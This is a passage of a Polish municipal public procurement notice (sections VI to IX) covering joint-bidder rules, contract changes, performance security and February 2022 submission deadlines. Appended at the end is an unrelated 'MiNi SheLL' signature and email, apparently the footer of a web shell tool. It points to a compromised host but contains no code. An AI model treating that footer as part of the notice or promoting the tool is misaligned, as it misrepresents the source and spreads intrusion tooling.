wykonawcy/każdego z wykonawców<br/>wspólnie ubiegających się o zamówienie (Dodatek nr 2 do SWZ).<br/>2. Do oferty, wykonawca załącza również:<br/>2.1. odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba<br/>działająca w imieniu wykonawcy jest umocowana do jego reprezentowania,<br/>2.2. pełnomocnictwo (jeśli dotyczy)<br/>2.3. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym<br/>mowa w rozdziale XVI pkt 4.3. SWZ - (jeśli dotyczy) (Zamawiający dopuszcza złożenia tego<br/>oświadczenia na formularzu ofertowym);<br/>2.4. Kosztorys ofertowy (Załącznik do Oferty). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka<br/>cywilna) zobowiązani są do złożenia wraz ofertą pełnomocnictwa do ich reprezentowania w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Powyższe nie dotyczy sytuacji, w której<br/>upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia wynika z dołączonej do oferty umowy regulującej współpracę<br/>Wykonawców bądź wszyscy wspólnicy podpiszą ofertę.<br/>2. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika).<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie, o<br/>którym mowa w art. 125 ust. 1 Ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających<br/>się o zamówienie.<br/>4. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp,<br/>zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których<br/>realizacji te uprawnienia są wymagane.<br/>5. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane, dostawy lub usługi, do realizacji których te zdolności są wymagane.<br/>6. W przypadku, o którym mowa w pkt. 4 i 5, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika odpowiednio, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy stanowią Dodatek nr 6 do SWZ.<br/>2. Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanychpostanowień umowy.<br/>3. Zamawiający, zgodnie z art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych, dopuszcza<br/>możliwość zmiany umowy w stosunku do treści złożonej oferty.<br/>4. Zmiana umowy może także nastąpić w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie dostępnej pod adresem: https://umsiemianowice.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-17 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1 dot. Okresu realizacji zamówienia albo umowy ramowej wskazanego w Sekcji IV pkt 4.2.10) niniejszego ogłoszenia:<br/>Termin realizacji zamówienia: 120 dni od daty podpisania umowy.<br/>2. dot. zabezpieczania należytego wykonania umowy:<br/>Wykonawca do dnia podpisania umowy zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy w wysokości stanowiącej 5% ceny całkowitej podanej w ofercie.<br/>3. dot. Terminu składania ofert wskazanego w Sekcji VIII pkt 8.1):<br/>Termin składania ofert: 2022-02-17, 09:00:00.

Creat By MiNi SheLL
Email: jattceo@gmail.com